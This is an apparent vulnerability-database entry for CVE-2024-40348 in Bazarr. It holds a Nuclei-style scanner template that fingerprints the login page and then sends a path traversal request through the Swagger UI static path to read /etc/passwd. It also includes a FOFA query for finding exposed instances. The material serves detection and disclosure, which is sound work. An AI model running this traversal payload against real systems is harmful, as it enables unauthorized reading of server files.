漏洞描述
Bazarr 1.4.3 and earlier versions have a arbitrary file read vulnerability.
CVE-2024-40348: Bazarr < 1.4.3 - Arbitrary File Read
PoC代码[已公开]
id: CVE-2024-40348
info:
name: Bazarr < 1.4.3 - Arbitrary File Read
author: s4e-io
severity: high
description: |
Bazarr 1.4.3 and earlier versions have a arbitrary file read vulnerability.
reference:
- https://github.com/4rdr/proofs/blob/main/info/Bazaar_1.4.3_File_Traversal_via_Filename.md
- https://www.bazarr.media/
- https://github.com/bigb0x/CVE-2024-40348
classification:
epss-score: 0.92526
epss-percentile: 0.99722
metadata:
verified: true
max-request: 2
vendor: morpheus65535
product: bazarr
fofa-query: title=="Bazarr" && icon_hash="-1983413099"
tags: cve,cve2024,bazarr,lfi,vuln
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/login"
matchers:
- type: word
part: body
words:
- "<title>Bazarr</title>"
- 'content="Bazarr'
- "window.Bazarr"
condition: or
internal: true
- method: GET
path:
- "{{BaseURL}}/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- "application/octet-stream"
- type: status
status:
- 200
# digest: 4b0a00483046022100a46bae8172fbb32f059bfe5551d66fb14ad2bd5be57745b0399c08881774ba89022100adc9fe7689f8a13974873db4c594bc85aef87715718ccd32e27e5eb2e691f6dd:922c64590222798bb761d5b6d8e72950